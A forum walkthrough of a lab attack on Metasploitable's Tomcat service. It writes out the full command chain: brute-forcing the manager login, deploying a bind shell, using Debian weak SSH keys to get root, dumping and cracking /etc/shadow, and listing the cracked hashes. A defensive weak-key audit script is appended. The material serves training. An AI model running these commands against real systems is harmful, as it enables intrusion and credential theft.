Thread: [Video] Metasploitable - TomCat

    Posted by g0tmi1k (Moderator)


    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3826187
    Download video: http://www.mediafire.com/?wv748u6o2jabdsw
    Download usernames.lst: http://www.mediafire.com/?j02jnj3gnx5
    Download passwords.lst: http://www.mediafire.com/?z5imdtojgnw
    Download (debian_ssh_rsa_2048_x86.tar.bz2): debian_ssh_rsa_2048_x86.tar.bz2


    What is this?
    This video demonstrates an attack on the TomCat service on the metasploitable hackable box.

    "Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com

    "Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process." - tomcat.apache.org


    Guide
    > Use Nmap to scan the network (gathering information)
    > Use Nmap to do a more detailed scan of the target (gathering information)
    > Use Metasploit to brute force the login (gaining access)
    > Use Metasploit to send a payload (remote access)
    > *I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
    > Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
    > Connect via SSH as root (complete access)
    > Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)


    What do I need?

    > Nmap --- on Backtrack 4 (Final)
    > Metasploit --- on Backtrack 4 (Final)
    > SSH --- on Backtrack 4 (Final)
    > John The Ripper --- on BackTrack!
    > Dictionaries/Word-lists --- Usernames Passwords
    > Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) --- http://www.mediafire.com/?i2mnwymzt51
    > Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
    > Metasploitable.part01.rar (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
    > Metasploitable.part02.rar (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
    > Metasploitable.part03.rar (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
    > Metasploitable.part04.rar (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)
    Commands:
    Code:
    # gathering information: find live hosts, then fingerprint the target
    nmap 192.168.1.1-255
    nmap -sV -sS -O -f -n 192.168.1.105
    firefox 192.168.1.105
    # gaining access: brute force the Tomcat manager login with the word-lists
    msfconsole
    search tomcat
    use scanner/http/tomcat_mgr_login
    show options
    setg RHOSTS 192.168.1.105
    setg RPORT 8180
    set USER_FILE /root/usernames.lst
    set PASS_FILE /root/passwords.lst
    exploit
    # remote access: deploy a payload through the manager with the recovered credentials
    use multi/http/tomcat_mgr_deploy
    show options
    setg USERNAME tomcat
    setg PASSWORD tomcat
    show payloads
    set payload generic/shell_bind_tcp
    show options
    exploit
    # in the resulting shell: look for root's SSH public key
    ls
    whoami
    hostname
    ls -lart /root
    ls -lart /root/.ssh
    cat /root/.ssh/authorized_keys
    # escalating privileges: fetch the weak Debian key set and search it for the captured key
    firefox -> www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
    tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
    cd rsa/2048
    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
    # complete access: log in as root with the matching weak private key
    ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
    whoami
    hostname
    ifconfig
    cat /etc/shadow
    # prove it: save the shadow file locally and crack it with John The Ripper
    kate -> Paste -> Save (Filename: /root/shadow)
    john
    ./john --rules --wordlist=/pentest/passwords/wordlists/darkc0de.lst
    ssh msfadmin@192.168.1.105
    Cracked accounts (user:password = /etc/shadow entry):
    ------------------------------------------------------------------------------------
    root:             = root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
    sys:batman        = sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
    klog:123456789    = klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
    msfadmin:msfadmin = msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
    postgres:postgres = postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
    user:user         = user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
    service:service   = service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
    ------------------------------------------------------------------------------------

    Notes:

    Song: Underworld - Cowgirl
    Video length: 7:07
    Capture length: 11:17

    Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-tomcat.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30078-%5Bvideo%5D-metasploitable-tomcat.html#post167042
    Last edited by g0tmi1k; 03-05-2011 at 02:05 PM.
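A defender-side counterpart to the weak-key comparison in the guide above, added here as an example and not part of g0tmi1k's post: it parses each ssh-rsa entry in an authorized_keys file, computes the MD5 fingerprint that `ssh-keygen -l -E md5` prints, and flags entries whose fingerprint is on a blacklist, reporting malformed entries as well. The blacklist and the authorized_keys content are constructed toy stand-ins; on a real host the fingerprints would come from the distribution's Debian weak-key blacklist files or the ssh-vulnkey tool.

```python
import base64, hashlib, struct  # stdlib only; toy data below is constructed for the example
def _ssh_string(data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + data
def encode_rsa_pubkey(e: int, n: int) -> str:
    """Base64 blob of an ssh-rsa key in OpenSSH wire format: "ssh-rsa", mpint e, mpint n."""
    mpint = lambda v: _ssh_string(v.to_bytes((v.bit_length() + 8) // 8, "big"))  # leading 0 if top bit set
    return base64.b64encode(_ssh_string(b"ssh-rsa") + mpint(e) + mpint(n)).decode()
def parse_pubkey_blob(blob: str) -> tuple:
    """Decode a base64 ssh-rsa blob into (e, n); raise ValueError if malformed."""
    raw, fields, off = base64.b64decode(blob), [], 0
    while off < len(raw):
        length = struct.unpack(">I", raw[off:off + 4])[0] if off + 4 <= len(raw) else -1
        if length < 0 or off + 4 + length > len(raw):
            raise ValueError("truncated field")
        fields.append(raw[off + 4:off + 4 + length])
        off += 4 + length
    if len(fields) != 3 or fields[0] != b"ssh-rsa":
        raise ValueError("not an ssh-rsa key")
    return int.from_bytes(fields[1], "big"), int.from_bytes(fields[2], "big")
def fingerprint_md5(blob: str) -> str:
    """MD5 fingerprint in the form printed by `ssh-keygen -l -E md5`."""
    digest = hashlib.md5(base64.b64decode(blob)).hexdigest()
    return "MD5:" + ":".join(digest[i:i + 2] for i in range(0, 32, 2))
def audit_authorized_keys(text: str, weak_fingerprints: set) -> list:
    """Return (line number, comment, reason) for weak or malformed ssh-rsa entries."""
    flagged = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if not parts or parts[0].startswith("#") or "ssh-rsa" not in parts[:-1]:
            continue  # blank, comment, other key type, or no blob after the type
        i = parts.index("ssh-rsa")  # options such as command="..." may precede the type
        blob, comment = parts[i + 1], " ".join(parts[i + 2:])
        try:
            parse_pubkey_blob(blob)
        except ValueError:
            flagged.append((lineno, comment, "malformed"))
            continue
        fp = fingerprint_md5(blob)
        if fp in weak_fingerprints:
            flagged.append((lineno, comment, fp))
    return flagged
# Constructed toy data standing in for the Debian blacklist and a real authorized_keys file.
WEAK_BLOB = encode_rsa_pubkey(65537, 0xDEADBEEFCAFE)  # toy modulus, not a real weak key
WEAK_FINGERPRINTS = {fingerprint_md5(WEAK_BLOB)}
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "ssh-rsa " + encode_rsa_pubkey(65537, 0xC0FFEE) + " ops@good-host",
    'no-pty,command="/usr/bin/backup" ssh-rsa ' + WEAK_BLOB + " backup@weak-host",
    "ssh-rsa AAAA broken@host",
])
```

Running `audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, WEAK_FINGERPRINTS)` flags line 2 (weak key, with its fingerprint) and line 3 (malformed) while leaving the first key alone.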